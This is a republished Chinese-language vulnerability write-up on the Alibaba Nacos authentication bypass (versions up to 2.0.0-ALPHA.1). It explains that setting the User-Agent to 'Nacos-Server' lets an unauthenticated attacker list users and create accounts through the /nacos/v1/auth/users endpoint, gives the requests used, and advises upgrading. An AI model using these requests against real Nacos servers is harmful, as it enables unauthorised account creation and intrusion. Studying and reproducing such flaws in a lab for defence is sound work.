Alibaba Nacos权限认证绕过
影响范围
Nacos <= 2.0.0-ALPHA.1
漏洞类型
权限认证绕过
利用条件
影响范围应用
漏洞概述
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞,攻击者可以通过该漏洞来创建新用户账户。
环境搭建
下载安装文件:
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1
之后执行以下命令启动环境:
./startup.sh -m standalone
之后访问http://your-ip:8848/nacos,默认账号密码为:nacos/nacos
漏洞复现
Step 1:查看用户列表
http://192.168.174.236:8848/nacos/v1/auth/users?pageNo=1&pageSize=1
Step 2:添加用户Al1ex
http://your-ip:8848/nacos/v1/auth/users
POST:
Nacos-Server
.......
username=Al1ex&password=Al1ex
Step 3:登录测试
成功登录:
安全建议
目前官方已发布最新版本,建议升级到最新版本~
参考链接
https://github.com/alibaba/nacos/issues/4593
本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-05-11,如有侵权请联系?cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。